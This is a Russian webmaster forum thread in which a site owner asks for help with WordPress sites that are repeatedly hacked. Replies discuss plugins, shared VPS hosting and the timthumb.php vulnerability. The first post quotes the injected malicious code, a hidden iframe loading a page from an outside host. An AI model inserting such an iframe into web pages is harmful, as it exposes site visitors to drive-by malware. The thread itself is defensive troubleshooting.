- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день. Уже в течение месяца постоянно взламывают сайты на Wordpress. Наверняка где-то есть уязвимость, но нахожу только последствия, а причину устранить так и не получается. В файлах index.php постоянно появляется код типа <iframe width=\'15\' height=\'15\' frameborder=\'0\'
> scrolling=\'no\' style=\"position:absolute;\"
> src=\"http://hokulele.us/gallery/images/iframe.php\"></iframe>. Или другой в блоках div. Яндекс и Гугл выводят сайты с пометкой о вредоносной коде. Коды удаляю, но они появляются вновь и вновь. Иногда еще появляются лишние файлы на сайтах.
Проверял их айболитом, удалял все вредоносные коды, файлы и тд, но это не помогает. Сейчас хочу попробовать улучшить защиту сайтов и устранить уязвимости. Где можно почитать о защите сайтов на wordpress? Также подскажите специалиста в этой области. Благодарю!
http://barlog.ru/category/user
По сабжу -
1. плагины какие?
2. сколько сайтов на хостинге?
В яндекс помощи
Все сайты на одном хосте?
Примерно половина взломов сайтов на Word Press приходится на уязвимость в скрипте timthumb.php
Если у Вас стоит старая версия (по размерам не превышает 20 к ) поменяйте на новую...
Вот здесь есть сканер на эту уязвимость http://wordpressadmin.ru/plugins/timthumb-vulnerability-scanner/
6666, 11 сайтов на одном VPS, но страдают постоянно 2. Плагинов много разных. Вот список:
Advanced Category Excluder
Akismet
All in One SEO Pack
Antispam Bee
Contact Form 7
Content Slide Plugin
Display widgets
Google XML Sitemaps
IGIT Related Post With Thumb
Lazy Load
Ozh' Better Feed
RusToLat
Scroll to Top Button
Subscribe To Comments
Wordpress Popular Posts
WP-Pagenavi
Wp Pagenavi Style
Dynamic To Top
---------- Добавлено 02.06.2013 в 13:57 ----------
yet_warm, на одном VPS
yet_warm, ага, походу да. Гимор. Чистить надо все одновременно, хоть на одном осталась маленькая козюля - и все заново :(
---------- Добавлено 02.06.2013 в 13:59 ----------
All in One SEO Pack
Antispam Bee
Contact Form 7
Content Slide Plugin
Display widgets
Google XML Sitemaps
IGIT Related Post With Thumb
Lazy Load
Ozh' Better Feed
RusToLat
Scroll to Top Button
Subscribe To Comments
Wordpress Popular Posts
WP-Pagenavi
Wp Pagenavi Style
Dynamic To Top
Почекайте сами: http://barlog.ru/187.html
xblogger, айболит тоже жаловался на timthumb.php. Эти файлы вроде находятся в плагинах? Старую версию wordpress имеете в виду поменять на новую?
Имеется в виду новая версия этого скрипта (timthumb.php) находится в папках js
xblogger, что-то я его не нашел в этих папках.
Местоположение скрипта в разных шаблонах разное, чаще всего он находится прямо в корне Вашей темы
\wp-content\themes\tema_wordpress\timthumb.php
другое место расположения в шаблоне например здесь:
\wp-content\themes\tema_word_press\scripts\timthumb.php
(если айболит жаловался на timthumb.php то должен был показать место)